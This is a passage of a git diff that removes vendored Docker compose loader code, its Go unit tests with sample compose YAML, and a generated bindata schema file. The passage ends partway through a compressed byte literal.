for key := range set { - keys = append(keys, key) - } - sort.Strings(keys) - return keys -} - -// GetDeprecatedProperties returns the list of any deprecated properties that -// are used in the compose files. 
-func GetDeprecatedProperties(configDetails types.ConfigDetails) map[string]string { - return getProperties(getServices(getConfigDict(configDetails)), types.DeprecatedProperties) -} - -func getProperties(services types.Dict, propertyMap map[string]string) map[string]string { - output := map[string]string{} - - for _, service := range services { - if serviceDict, ok := service.(types.Dict); ok { - for property, description := range propertyMap { - if _, isSet := serviceDict[property]; isSet { - output[property] = description - } - } - } - } - - return output -} - -// ForbiddenPropertiesError is returned when there are properties in the Compose -// file that are forbidden. -type ForbiddenPropertiesError struct { - Properties map[string]string -} - -func (e *ForbiddenPropertiesError) Error() string { - return "Configuration contains forbidden properties" -} - -// TODO: resolve multiple files into a single config -func getConfigDict(configDetails types.ConfigDetails) types.Dict { - return configDetails.ConfigFiles[0].Config -} - -func getServices(configDict types.Dict) types.Dict { - if services, ok := configDict["services"]; ok { - if servicesDict, ok := services.(types.Dict); ok { - return servicesDict - } - } - - return types.Dict{} -} - -func transform(source map[string]interface{}, target interface{}) error { - data := mapstructure.Metadata{} - config := &mapstructure.DecoderConfig{ - DecodeHook: mapstructure.ComposeDecodeHookFunc( - transformHook, - mapstructure.StringToTimeDurationHookFunc()), - Result: target, - Metadata: &data, - } - decoder, err := mapstructure.NewDecoder(config) - if err != nil { - return err - } - err = decoder.Decode(source) - // TODO: log unused keys - return err -} - -func transformHook( - source reflect.Type, - target reflect.Type, - data interface{}, -) (interface{}, error) { - switch target { - case reflect.TypeOf(types.External{}): - return transformExternal(data) - case reflect.TypeOf(make(map[string]string, 0)): - return 
transformMapStringString(source, target, data) - case reflect.TypeOf(types.UlimitsConfig{}): - return transformUlimits(data) - case reflect.TypeOf(types.UnitBytes(0)): - return loadSize(data) - case reflect.TypeOf(types.ServiceSecretConfig{}): - return transformServiceSecret(data) - } - switch target.Kind() { - case reflect.Struct: - return transformStruct(source, target, data) - } - return data, nil -} - -// keys needs to be converted to strings for jsonschema -// TODO: don't use types.Dict -func convertToStringKeysRecursive(value interface{}, keyPrefix string) (interface{}, error) { - if mapping, ok := value.(map[interface{}]interface{}); ok { - dict := make(types.Dict) - for key, entry := range mapping { - str, ok := key.(string) - if !ok { - var location string - if keyPrefix == "" { - location = "at top level" - } else { - location = fmt.Sprintf("in %s", keyPrefix) - } - return nil, fmt.Errorf("Non-string key %s: %#v", location, key) - } - var newKeyPrefix string - if keyPrefix == "" { - newKeyPrefix = str - } else { - newKeyPrefix = fmt.Sprintf("%s.%s", keyPrefix, str) - } - convertedEntry, err := convertToStringKeysRecursive(entry, newKeyPrefix) - if err != nil { - return nil, err - } - dict[str] = convertedEntry - } - return dict, nil - } - if list, ok := value.([]interface{}); ok { - var convertedList []interface{} - for index, entry := range list { - newKeyPrefix := fmt.Sprintf("%s[%d]", keyPrefix, index) - convertedEntry, err := convertToStringKeysRecursive(entry, newKeyPrefix) - if err != nil { - return nil, err - } - convertedList = append(convertedList, convertedEntry) - } - return convertedList, nil - } - return value, nil -} - -func loadServices(servicesDict types.Dict, workingDir string) ([]types.ServiceConfig, error) { - var services []types.ServiceConfig - - for name, serviceDef := range servicesDict { - serviceConfig, err := loadService(name, serviceDef.(types.Dict), workingDir) - if err != nil { - return nil, err - } - services = 
append(services, *serviceConfig) - } - - return services, nil -} - -func loadService(name string, serviceDict types.Dict, workingDir string) (*types.ServiceConfig, error) { - serviceConfig := &types.ServiceConfig{} - if err := transform(serviceDict, serviceConfig); err != nil { - return nil, err - } - serviceConfig.Name = name - - if err := resolveEnvironment(serviceConfig, serviceDict, workingDir); err != nil { - return nil, err - } - - if err := resolveVolumePaths(serviceConfig.Volumes, workingDir); err != nil { - return nil, err - } - - return serviceConfig, nil -} - -func resolveEnvironment(serviceConfig *types.ServiceConfig, serviceDict types.Dict, workingDir string) error { - environment := make(map[string]string) - - if envFileVal, ok := serviceDict["env_file"]; ok { - envFiles := loadStringOrListOfStrings(envFileVal) - - var envVars []string - - for _, file := range envFiles { - filePath := absPath(workingDir, file) - fileVars, err := opts.ParseEnvFile(filePath) - if err != nil { - return err - } - envVars = append(envVars, fileVars...) 
- } - - for k, v := range opts.ConvertKVStringsToMap(envVars) { - environment[k] = v - } - } - - for k, v := range serviceConfig.Environment { - environment[k] = v - } - - serviceConfig.Environment = environment - - return nil -} - -func resolveVolumePaths(volumes []string, workingDir string) error { - for i, mapping := range volumes { - parts := strings.SplitN(mapping, ":", 2) - if len(parts) == 1 { - continue - } - - if strings.HasPrefix(parts[0], ".") { - parts[0] = absPath(workingDir, parts[0]) - } - parts[0] = expandUser(parts[0]) - - volumes[i] = strings.Join(parts, ":") - } - - return nil -} - -// TODO: make this more robust -func expandUser(path string) string { - if strings.HasPrefix(path, "~") { - return strings.Replace(path, "~", os.Getenv("HOME"), 1) - } - return path -} - -func transformUlimits(data interface{}) (interface{}, error) { - switch value := data.(type) { - case int: - return types.UlimitsConfig{Single: value}, nil - case types.Dict: - ulimit := types.UlimitsConfig{} - ulimit.Soft = value["soft"].(int) - ulimit.Hard = value["hard"].(int) - return ulimit, nil - default: - return data, fmt.Errorf("invalid type %T for ulimits", value) - } -} - -func loadNetworks(source types.Dict) (map[string]types.NetworkConfig, error) { - networks := make(map[string]types.NetworkConfig) - err := transform(source, &networks) - if err != nil { - return networks, err - } - for name, network := range networks { - if network.External.External && network.External.Name == "" { - network.External.Name = name - networks[name] = network - } - } - return networks, nil -} - -func loadVolumes(source types.Dict) (map[string]types.VolumeConfig, error) { - volumes := make(map[string]types.VolumeConfig) - err := transform(source, &volumes) - if err != nil { - return volumes, err - } - for name, volume := range volumes { - if volume.External.External && volume.External.Name == "" { - volume.External.Name = name - volumes[name] = volume - } - } - return volumes, nil -} - -// 
TODO: remove duplicate with networks/volumes -func loadSecrets(source types.Dict, workingDir string) (map[string]types.SecretConfig, error) { - secrets := make(map[string]types.SecretConfig) - if err := transform(source, &secrets); err != nil { - return secrets, err - } - for name, secret := range secrets { - if secret.External.External && secret.External.Name == "" { - secret.External.Name = name - secrets[name] = secret - } - if secret.File != "" { - secret.File = absPath(workingDir, secret.File) - } - } - return secrets, nil -} - -func absPath(workingDir string, filepath string) string { - if path.IsAbs(filepath) { - return filepath - } - return path.Join(workingDir, filepath) -} - -func transformStruct( - source reflect.Type, - target reflect.Type, - data interface{}, -) (interface{}, error) { - structValue, ok := data.(map[string]interface{}) - if !ok { - // FIXME: this is necessary because of convertToStringKeysRecursive - structValue, ok = data.(types.Dict) - if !ok { - panic(fmt.Sprintf( - "transformStruct called with non-map type: %T, %s", data, data)) - } - } - - var err error - for i := 0; i < target.NumField(); i++ { - field := target.Field(i) - fieldTag := field.Tag.Get("compose") - - yamlName := toYAMLName(field.Name) - value, ok := structValue[yamlName] - if !ok { - continue - } - - structValue[yamlName], err = convertField( - fieldTag, reflect.TypeOf(value), field.Type, value) - if err != nil { - return nil, fmt.Errorf("field %s: %s", yamlName, err.Error()) - } - } - return structValue, nil -} - -func transformMapStringString( - source reflect.Type, - target reflect.Type, - data interface{}, -) (interface{}, error) { - switch value := data.(type) { - case map[string]interface{}: - return toMapStringString(value), nil - case types.Dict: - return toMapStringString(value), nil - case map[string]string: - return value, nil - default: - return data, fmt.Errorf("invalid type %T for map[string]string", value) - } -} - -func convertField( - fieldTag string, 
- source reflect.Type, - target reflect.Type, - data interface{}, -) (interface{}, error) { - switch fieldTag { - case "": - return data, nil - case "healthcheck": - return loadHealthcheck(data) - case "list_or_dict_equals": - return loadMappingOrList(data, "="), nil - case "list_or_dict_colon": - return loadMappingOrList(data, ":"), nil - case "list_or_struct_map": - return loadListOrStructMap(data, target) - case "string_or_list": - return loadStringOrListOfStrings(data), nil - case "list_of_strings_or_numbers": - return loadListOfStringsOrNumbers(data), nil - case "shell_command": - return loadShellCommand(data) - case "size": - return loadSize(data) - case "-": - return nil, nil - } - return data, nil -} - -func transformExternal(data interface{}) (interface{}, error) { - switch value := data.(type) { - case bool: - return map[string]interface{}{"external": value}, nil - case types.Dict: - return map[string]interface{}{"external": true, "name": value["name"]}, nil - case map[string]interface{}: - return map[string]interface{}{"external": true, "name": value["name"]}, nil - default: - return data, fmt.Errorf("invalid type %T for external", value) - } -} - -func transformServiceSecret(data interface{}) (interface{}, error) { - switch value := data.(type) { - case string: - return map[string]interface{}{"source": value}, nil - case types.Dict: - return data, nil - case map[string]interface{}: - return data, nil - default: - return data, fmt.Errorf("invalid type %T for external", value) - } - -} - -func toYAMLName(name string) string { - nameParts := fieldNameRegexp.FindAllString(name, -1) - for i, p := range nameParts { - nameParts[i] = strings.ToLower(p) - } - return strings.Join(nameParts, "_") -} - -func loadListOrStructMap(value interface{}, target reflect.Type) (interface{}, error) { - if list, ok := value.([]interface{}); ok { - mapValue := map[interface{}]interface{}{} - for _, name := range list { - mapValue[name] = nil - } - return mapValue, nil - } - - 
return value, nil -} - -func loadListOfStringsOrNumbers(value interface{}) []string { - list := value.([]interface{}) - result := make([]string, len(list)) - for i, item := range list { - result[i] = fmt.Sprint(item) - } - return result -} - -func loadStringOrListOfStrings(value interface{}) []string { - if list, ok := value.([]interface{}); ok { - result := make([]string, len(list)) - for i, item := range list { - result[i] = fmt.Sprint(item) - } - return result - } - return []string{value.(string)} -} - -func loadMappingOrList(mappingOrList interface{}, sep string) map[string]string { - if mapping, ok := mappingOrList.(types.Dict); ok { - return toMapStringString(mapping) - } - if list, ok := mappingOrList.([]interface{}); ok { - result := make(map[string]string) - for _, value := range list { - parts := strings.SplitN(value.(string), sep, 2) - if len(parts) == 1 { - result[parts[0]] = "" - } else { - result[parts[0]] = parts[1] - } - } - return result - } - panic(fmt.Errorf("expected a map or a slice, got: %#v", mappingOrList)) -} - -func loadShellCommand(value interface{}) (interface{}, error) { - if str, ok := value.(string); ok { - return shellwords.Parse(str) - } - return value, nil -} - -func loadHealthcheck(value interface{}) (interface{}, error) { - if str, ok := value.(string); ok { - return append([]string{"CMD-SHELL"}, str), nil - } - return value, nil -} - -func loadSize(value interface{}) (int64, error) { - switch value := value.(type) { - case int: - return int64(value), nil - case string: - return units.RAMInBytes(value) - } - panic(fmt.Errorf("invalid type for size %T", value)) -} - -func toMapStringString(value map[string]interface{}) map[string]string { - output := make(map[string]string) - for key, value := range value { - output[key] = toString(value) - } - return output -} - -func toString(value interface{}) string { - if value == nil { - return "" - } - return fmt.Sprint(value) -} diff --git 
a/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go b/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go deleted file mode 100644 index f7fee89ede..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go +++ /dev/null @@ -1,800 +0,0 @@ -package loader - -import ( - "fmt" - "io/ioutil" - "os" - "sort" - "testing" - "time" - - "github.com/docker/docker/cli/compose/types" - "github.com/stretchr/testify/assert" -) - -func buildConfigDetails(source types.Dict) types.ConfigDetails { - workingDir, err := os.Getwd() - if err != nil { - panic(err) - } - - return types.ConfigDetails{ - WorkingDir: workingDir, - ConfigFiles: []types.ConfigFile{ - {Filename: "filename.yml", Config: source}, - }, - Environment: nil, - } -} - -var sampleYAML = ` -version: "3" -services: - foo: - image: busybox - networks: - with_me: - bar: - image: busybox - environment: - - FOO=1 - networks: - - with_ipam -volumes: - hello: - driver: default - driver_opts: - beep: boop -networks: - default: - driver: bridge - driver_opts: - beep: boop - with_ipam: - ipam: - driver: default - config: - - subnet: 172.28.0.0/16 -` - -var sampleDict = types.Dict{ - "version": "3", - "services": types.Dict{ - "foo": types.Dict{ - "image": "busybox", - "networks": types.Dict{"with_me": nil}, - }, - "bar": types.Dict{ - "image": "busybox", - "environment": []interface{}{"FOO=1"}, - "networks": []interface{}{"with_ipam"}, - }, - }, - "volumes": types.Dict{ - "hello": types.Dict{ - "driver": "default", - "driver_opts": types.Dict{ - "beep": "boop", - }, - }, - }, - "networks": types.Dict{ - "default": types.Dict{ - "driver": "bridge", - "driver_opts": types.Dict{ - "beep": "boop", - }, - }, - "with_ipam": types.Dict{ - "ipam": types.Dict{ - "driver": "default", - "config": []interface{}{ - types.Dict{ - "subnet": "172.28.0.0/16", - }, - }, - }, - }, - }, -} - -var sampleConfig = types.Config{ - Services: []types.ServiceConfig{ - { - Name: "foo", - Image: 
"busybox", - Environment: map[string]string{}, - Networks: map[string]*types.ServiceNetworkConfig{ - "with_me": nil, - }, - }, - { - Name: "bar", - Image: "busybox", - Environment: map[string]string{"FOO": "1"}, - Networks: map[string]*types.ServiceNetworkConfig{ - "with_ipam": nil, - }, - }, - }, - Networks: map[string]types.NetworkConfig{ - "default": { - Driver: "bridge", - DriverOpts: map[string]string{ - "beep": "boop", - }, - }, - "with_ipam": { - Ipam: types.IPAMConfig{ - Driver: "default", - Config: []*types.IPAMPool{ - { - Subnet: "172.28.0.0/16", - }, - }, - }, - }, - }, - Volumes: map[string]types.VolumeConfig{ - "hello": { - Driver: "default", - DriverOpts: map[string]string{ - "beep": "boop", - }, - }, - }, -} - -func TestParseYAML(t *testing.T) { - dict, err := ParseYAML([]byte(sampleYAML)) - if !assert.NoError(t, err) { - return - } - assert.Equal(t, sampleDict, dict) -} - -func TestLoad(t *testing.T) { - actual, err := Load(buildConfigDetails(sampleDict)) - if !assert.NoError(t, err) { - return - } - assert.Equal(t, serviceSort(sampleConfig.Services), serviceSort(actual.Services)) - assert.Equal(t, sampleConfig.Networks, actual.Networks) - assert.Equal(t, sampleConfig.Volumes, actual.Volumes) -} - -func TestLoadV31(t *testing.T) { - actual, err := loadYAML(` -version: "3.1" -services: - foo: - image: busybox - secrets: [super] -secrets: - super: - external: true -`) - if !assert.NoError(t, err) { - return - } - assert.Equal(t, len(actual.Services), 1) - assert.Equal(t, len(actual.Secrets), 1) -} - -func TestParseAndLoad(t *testing.T) { - actual, err := loadYAML(sampleYAML) - if !assert.NoError(t, err) { - return - } - assert.Equal(t, serviceSort(sampleConfig.Services), serviceSort(actual.Services)) - assert.Equal(t, sampleConfig.Networks, actual.Networks) - assert.Equal(t, sampleConfig.Volumes, actual.Volumes) -} - -func TestInvalidTopLevelObjectType(t *testing.T) { - _, err := loadYAML("1") - assert.Error(t, err) - assert.Contains(t, err.Error(), 
"Top-level object must be a mapping") - - _, err = loadYAML("\"hello\"") - assert.Error(t, err) - assert.Contains(t, err.Error(), "Top-level object must be a mapping") - - _, err = loadYAML("[\"hello\"]") - assert.Error(t, err) - assert.Contains(t, err.Error(), "Top-level object must be a mapping") -} - -func TestNonStringKeys(t *testing.T) { - _, err := loadYAML(` -version: "3" -123: - foo: - image: busybox -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "Non-string key at top level: 123") - - _, err = loadYAML(` -version: "3" -services: - foo: - image: busybox - 123: - image: busybox -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "Non-string key in services: 123") - - _, err = loadYAML(` -version: "3" -services: - foo: - image: busybox -networks: - default: - ipam: - config: - - 123: oh dear -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "Non-string key in networks.default.ipam.config[0]: 123") - - _, err = loadYAML(` -version: "3" -services: - dict-env: - image: busybox - environment: - 1: FOO -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "Non-string key in services.dict-env.environment: 1") -} - -func TestSupportedVersion(t *testing.T) { - _, err := loadYAML(` -version: "3" -services: - foo: - image: busybox -`) - assert.NoError(t, err) - - _, err = loadYAML(` -version: "3.0" -services: - foo: - image: busybox -`) - assert.NoError(t, err) -} - -func TestUnsupportedVersion(t *testing.T) { - _, err := loadYAML(` -version: "2" -services: - foo: - image: busybox -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "version") - - _, err = loadYAML(` -version: "2.0" -services: - foo: - image: busybox -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "version") -} - -func TestInvalidVersion(t *testing.T) { - _, err := loadYAML(` -version: 3 -services: - foo: - image: busybox -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "version must be a string") -} - -func TestV1Unsupported(t 
*testing.T) { - _, err := loadYAML(` -foo: - image: busybox -`) - assert.Error(t, err) -} - -func TestNonMappingObject(t *testing.T) { - _, err := loadYAML(` -version: "3" -services: - - foo: - image: busybox -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "services must be a mapping") - - _, err = loadYAML(` -version: "3" -services: - foo: busybox -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "services.foo must be a mapping") - - _, err = loadYAML(` -version: "3" -networks: - - default: - driver: bridge -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "networks must be a mapping") - - _, err = loadYAML(` -version: "3" -networks: - default: bridge -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "networks.default must be a mapping") - - _, err = loadYAML(` -version: "3" -volumes: - - data: - driver: local -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "volumes must be a mapping") - - _, err = loadYAML(` -version: "3" -volumes: - data: local -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "volumes.data must be a mapping") -} - -func TestNonStringImage(t *testing.T) { - _, err := loadYAML(` -version: "3" -services: - foo: - image: ["busybox", "latest"] -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "services.foo.image must be a string") -} - -func TestValidEnvironment(t *testing.T) { - config, err := loadYAML(` -version: "3" -services: - dict-env: - image: busybox - environment: - FOO: "1" - BAR: 2 - BAZ: 2.5 - QUUX: - list-env: - image: busybox - environment: - - FOO=1 - - BAR=2 - - BAZ=2.5 - - QUUX= -`) - assert.NoError(t, err) - - expected := map[string]string{ - "FOO": "1", - "BAR": "2", - "BAZ": "2.5", - "QUUX": "", - } - - assert.Equal(t, 2, len(config.Services)) - - for _, service := range config.Services { - assert.Equal(t, expected, service.Environment) - } -} - -func TestInvalidEnvironmentValue(t *testing.T) { - _, err := loadYAML(` -version: "3" -services: - 
dict-env: - image: busybox - environment: - FOO: ["1"] -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "services.dict-env.environment.FOO must be a string, number or null") -} - -func TestInvalidEnvironmentObject(t *testing.T) { - _, err := loadYAML(` -version: "3" -services: - dict-env: - image: busybox - environment: "FOO=1" -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "services.dict-env.environment must be a mapping") -} - -func TestEnvironmentInterpolation(t *testing.T) { - config, err := loadYAML(` -version: "3" -services: - test: - image: busybox - labels: - - home1=$HOME - - home2=${HOME} - - nonexistent=$NONEXISTENT - - default=${NONEXISTENT-default} -networks: - test: - driver: $HOME -volumes: - test: - driver: $HOME -`) - - assert.NoError(t, err) - - home := os.Getenv("HOME") - - expectedLabels := map[string]string{ - "home1": home, - "home2": home, - "nonexistent": "", - "default": "default", - } - - assert.Equal(t, expectedLabels, config.Services[0].Labels) - assert.Equal(t, home, config.Networks["test"].Driver) - assert.Equal(t, home, config.Volumes["test"].Driver) -} - -func TestUnsupportedProperties(t *testing.T) { - dict, err := ParseYAML([]byte(` -version: "3" -services: - web: - image: web - build: ./web - links: - - bar - db: - image: db - build: ./db -`)) - assert.NoError(t, err) - - configDetails := buildConfigDetails(dict) - - _, err = Load(configDetails) - assert.NoError(t, err) - - unsupported := GetUnsupportedProperties(configDetails) - assert.Equal(t, []string{"build", "links"}, unsupported) -} - -func TestDeprecatedProperties(t *testing.T) { - dict, err := ParseYAML([]byte(` -version: "3" -services: - web: - image: web - container_name: web - db: - image: db - container_name: db - expose: ["5434"] -`)) - assert.NoError(t, err) - - configDetails := buildConfigDetails(dict) - - _, err = Load(configDetails) - assert.NoError(t, err) - - deprecated := GetDeprecatedProperties(configDetails) - assert.Equal(t, 2, 
len(deprecated)) - assert.Contains(t, deprecated, "container_name") - assert.Contains(t, deprecated, "expose") -} - -func TestForbiddenProperties(t *testing.T) { - _, err := loadYAML(` -version: "3" -services: - foo: - image: busybox - volumes: - - /data - volume_driver: some-driver - bar: - extends: - service: foo -`) - - assert.Error(t, err) - assert.IsType(t, &ForbiddenPropertiesError{}, err) - fmt.Println(err) - forbidden := err.(*ForbiddenPropertiesError).Properties - - assert.Equal(t, 2, len(forbidden)) - assert.Contains(t, forbidden, "volume_driver") - assert.Contains(t, forbidden, "extends") -} - -func durationPtr(value time.Duration) *time.Duration { - return &value -} - -func int64Ptr(value int64) *int64 { - return &value -} - -func uint64Ptr(value uint64) *uint64 { - return &value -} - -func TestFullExample(t *testing.T) { - bytes, err := ioutil.ReadFile("full-example.yml") - assert.NoError(t, err) - - config, err := loadYAML(string(bytes)) - if !assert.NoError(t, err) { - return - } - - workingDir, err := os.Getwd() - assert.NoError(t, err) - - homeDir := os.Getenv("HOME") - stopGracePeriod := time.Duration(20 * time.Second) - - expectedServiceConfig := types.ServiceConfig{ - Name: "foo", - - CapAdd: []string{"ALL"}, - CapDrop: []string{"NET_ADMIN", "SYS_ADMIN"}, - CgroupParent: "m-executor-abcd", - Command: []string{"bundle", "exec", "thin", "-p", "3000"}, - ContainerName: "my-web-container", - DependsOn: []string{"db", "redis"}, - Deploy: types.DeployConfig{ - Mode: "replicated", - Replicas: uint64Ptr(6), - Labels: map[string]string{"FOO": "BAR"}, - UpdateConfig: &types.UpdateConfig{ - Parallelism: uint64Ptr(3), - Delay: time.Duration(10 * time.Second), - FailureAction: "continue", - Monitor: time.Duration(60 * time.Second), - MaxFailureRatio: 0.3, - }, - Resources: types.Resources{ - Limits: &types.Resource{ - NanoCPUs: "0.001", - MemoryBytes: 50 * 1024 * 1024, - }, - Reservations: &types.Resource{ - NanoCPUs: "0.0001", - MemoryBytes: 20 * 1024 * 
1024, - }, - }, - RestartPolicy: &types.RestartPolicy{ - Condition: "on_failure", - Delay: durationPtr(5 * time.Second), - MaxAttempts: uint64Ptr(3), - Window: durationPtr(2 * time.Minute), - }, - Placement: types.Placement{ - Constraints: []string{"node=foo"}, - }, - }, - Devices: []string{"/dev/ttyUSB0:/dev/ttyUSB0"}, - DNS: []string{"8.8.8.8", "9.9.9.9"}, - DNSSearch: []string{"dc1.example.com", "dc2.example.com"}, - DomainName: "foo.com", - Entrypoint: []string{"/code/entrypoint.sh", "-p", "3000"}, - Environment: map[string]string{ - "RACK_ENV": "development", - "SHOW": "true", - "SESSION_SECRET": "", - "FOO": "1", - "BAR": "2", - "BAZ": "3", - }, - Expose: []string{"3000", "8000"}, - ExternalLinks: []string{ - "redis_1", - "project_db_1:mysql", - "project_db_1:postgresql", - }, - ExtraHosts: map[string]string{ - "otherhost": "50.31.209.229", - "somehost": "162.242.195.82", - }, - HealthCheck: &types.HealthCheckConfig{ - Test: []string{ - "CMD-SHELL", - "echo \"hello world\"", - }, - Interval: "10s", - Timeout: "1s", - Retries: uint64Ptr(5), - }, - Hostname: "foo", - Image: "redis", - Ipc: "host", - Labels: map[string]string{ - "com.example.description": "Accounting webapp", - "com.example.number": "42", - "com.example.empty-label": "", - }, - Links: []string{ - "db", - "db:database", - "redis", - }, - Logging: &types.LoggingConfig{ - Driver: "syslog", - Options: map[string]string{ - "syslog-address": "tcp://192.168.0.42:123", - }, - }, - MacAddress: "02:42:ac:11:65:43", - NetworkMode: "container:0cfeab0f748b9a743dc3da582046357c6ef497631c1a016d28d2bf9b4f899f7b", - Networks: map[string]*types.ServiceNetworkConfig{ - "some-network": { - Aliases: []string{"alias1", "alias3"}, - Ipv4Address: "", - Ipv6Address: "", - }, - "other-network": { - Ipv4Address: "172.16.238.10", - Ipv6Address: "2001:3984:3989::10", - }, - "other-other-network": nil, - }, - Pid: "host", - Ports: []string{ - "3000", - "3000-3005", - "8000:8000", - "9090-9091:8080-8081", - "49100:22", - 
"127.0.0.1:8001:8001", - "127.0.0.1:5000-5010:5000-5010", - }, - Privileged: true, - ReadOnly: true, - Restart: "always", - SecurityOpt: []string{ - "label=level:s0:c100,c200", - "label=type:svirt_apache_t", - }, - StdinOpen: true, - StopSignal: "SIGUSR1", - StopGracePeriod: &stopGracePeriod, - Tmpfs: []string{"/run", "/tmp"}, - Tty: true, - Ulimits: map[string]*types.UlimitsConfig{ - "nproc": { - Single: 65535, - }, - "nofile": { - Soft: 20000, - Hard: 40000, - }, - }, - User: "someone", - Volumes: []string{ - "/var/lib/mysql", - "/opt/data:/var/lib/mysql", - fmt.Sprintf("%s:/code", workingDir), - fmt.Sprintf("%s/static:/var/www/html", workingDir), - fmt.Sprintf("%s/configs:/etc/configs/:ro", homeDir), - "datavolume:/var/lib/mysql", - }, - WorkingDir: "/code", - } - - assert.Equal(t, []types.ServiceConfig{expectedServiceConfig}, config.Services) - - expectedNetworkConfig := map[string]types.NetworkConfig{ - "some-network": {}, - - "other-network": { - Driver: "overlay", - DriverOpts: map[string]string{ - "foo": "bar", - "baz": "1", - }, - Ipam: types.IPAMConfig{ - Driver: "overlay", - Config: []*types.IPAMPool{ - {Subnet: "172.16.238.0/24"}, - {Subnet: "2001:3984:3989::/64"}, - }, - }, - }, - - "external-network": { - External: types.External{ - Name: "external-network", - External: true, - }, - }, - - "other-external-network": { - External: types.External{ - Name: "my-cool-network", - External: true, - }, - }, - } - - assert.Equal(t, expectedNetworkConfig, config.Networks) - - expectedVolumeConfig := map[string]types.VolumeConfig{ - "some-volume": {}, - "other-volume": { - Driver: "flocker", - DriverOpts: map[string]string{ - "foo": "bar", - "baz": "1", - }, - }, - "external-volume": { - External: types.External{ - Name: "external-volume", - External: true, - }, - }, - "other-external-volume": { - External: types.External{ - Name: "my-cool-volume", - External: true, - }, - }, - } - - assert.Equal(t, expectedVolumeConfig, config.Volumes) -} - -func loadYAML(yaml 
string) (*types.Config, error) { - dict, err := ParseYAML([]byte(yaml)) - if err != nil { - return nil, err - } - - return Load(buildConfigDetails(dict)) -} - -func serviceSort(services []types.ServiceConfig) []types.ServiceConfig { - sort.Sort(servicesByName(services)) - return services -} - -type servicesByName []types.ServiceConfig - -func (sbn servicesByName) Len() int { return len(sbn) } -func (sbn servicesByName) Swap(i, j int) { sbn[i], sbn[j] = sbn[j], sbn[i] } -func (sbn servicesByName) Less(i, j int) bool { return sbn[i].Name < sbn[j].Name } diff --git a/vendor/github.com/docker/docker/cli/compose/schema/bindata.go b/vendor/github.com/docker/docker/cli/compose/schema/bindata.go deleted file mode 100644 index 9486e91ae0..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/schema/bindata.go +++ /dev/null @@ -1,260 +0,0 @@ -// Code generated by go-bindata. -// sources: -// data/config_schema_v3.0.json -// data/config_schema_v3.1.json -// DO NOT EDIT! - -package schema - -import ( - "bytes" - "compress/gzip" - "fmt" - "io" - "io/ioutil" - "os" - "path/filepath" - "strings" - "time" -) - -func bindataRead(data []byte, name string) ([]byte, error) { - gz, err := gzip.NewReader(bytes.NewBuffer(data)) - if err != nil { - return nil, fmt.Errorf("Read %q: %v", name, err) - } - - var buf bytes.Buffer - _, err = io.Copy(&buf, gz) - clErr := gz.Close() - - if err != nil { - return nil, fmt.Errorf("Read %q: %v", name, err) - } - if clErr != nil { - return nil, err - } - - return buf.Bytes(), nil -} - -type asset struct { - bytes []byte - info os.FileInfo -} - -type bindataFileInfo struct { - name string - size int64 - mode os.FileMode - modTime time.Time -} - -func (fi bindataFileInfo) Name() string { - return fi.name -} -func (fi bindataFileInfo) Size() int64 { - return fi.size -} -func (fi bindataFileInfo) Mode() os.FileMode { - return fi.mode -} -func (fi bindataFileInfo) ModTime() time.Time { - return fi.modTime -} -func (fi bindataFileInfo) IsDir() bool { 
- return false -} -func (fi bindataFileInfo) Sys() interface{} { - return nil -} - -var _dataConfig_schema_v30Json = []byte("\x1f\x8b\x08\x00\x00\x09\x6e\x88\x00\xff\xec\x5a\x4f\x8f\xdb\xb8\x0e\xbf\xe7\x53\x18\x6e\x6f\xcd\xcc\x14\x78\xc5\x03\x5e\x6f\xef\xb8\xa7\xdd\xf3\x0e\x5c\x43\xb1\x99\x44\x1d\x59\x52\x29\x39\x9d\xb4\xc8\x77\x5f\xc8\xff\x22\x2b\x92\xe5\x24\xee\xb6\x87\x9e\x66\x62\x91\x14\xff\xe9\x47\x8a\xf6\xf7\x55\x92\xa4\x6f\x55\xb1\x87\x8a\xa4\x1f\x93\x74\xaf\xb5\xfc\xf8\xf4\xf4\x59\x09\xfe\xd0\x3e\x7d\x14\xb8\x7b\x2a\x91\x6c\xf5\xc3\xfb\x0f\x4f\xed\xb3\x37\xe9\xda\xf0\xd1\xd2\xb0\x14\x82\x6f\xe9\x2e\x6f\x57\xf2\xc3\x7f\x1e\xdf\x3f\x1a\xf6\x96\x44\x1f\x25\x18\x22\xb1\xf9\x0c\x85\x6e\x9f\x21\x7c\xa9\x29\x82\x61\x7e\x4e\x0f\x80\x8a\x0a\x9e\x66\xeb\x95\x59\x93\x28\x24\xa0\xa6\xa0\xd2\x8f\x89\x51\x2e\x49\x06\x92\xfe\x81\x25\x56\x69\xa4\x7c\x97\x36\x8f\x4f\x8d\x84\x24\x49\x15\xe0\x81\x16\x96\x84\x41\xd5\x37\x4f\x67\xf9\x4f\x03\xd9\xda\x95\x6a\x29\xdb\x3c\x97\x44\x6b\x40\xfe\xd7\xa5\x6e\xcd\xf2\xa7\x67\xf2\xf0\xed\xff\x0f\x7f\xbf\x7f\xf8\xdf\x63\xfe\x90\xbd\x7b\x3b\x5a\x36\xfe\x45\xd8\xb6\xdb\x97\xb0\xa5\x9c\x6a\x2a\xf8\xb0\x7f\x3a\x50\x9e\xba\xff\x4e\xc3\xc6\xa4\x2c\x1b\x62\xc2\x46\x7b\x6f\x09\x53\x30\xb6\x99\x83\xfe\x2a\xf0\x25\x66\xf3\x40\xf6\x93\x6c\xee\xf6\xf7\xd8\x3c\x36\xe7\x20\x58\x5d\x45\x23\xd8\x53\xfd\x24\x63\xda\xed\xef\x8b\xdf\xaa\x37\x7a\x92\xb6\xa5\xb0\xf6\x6e\x14\x1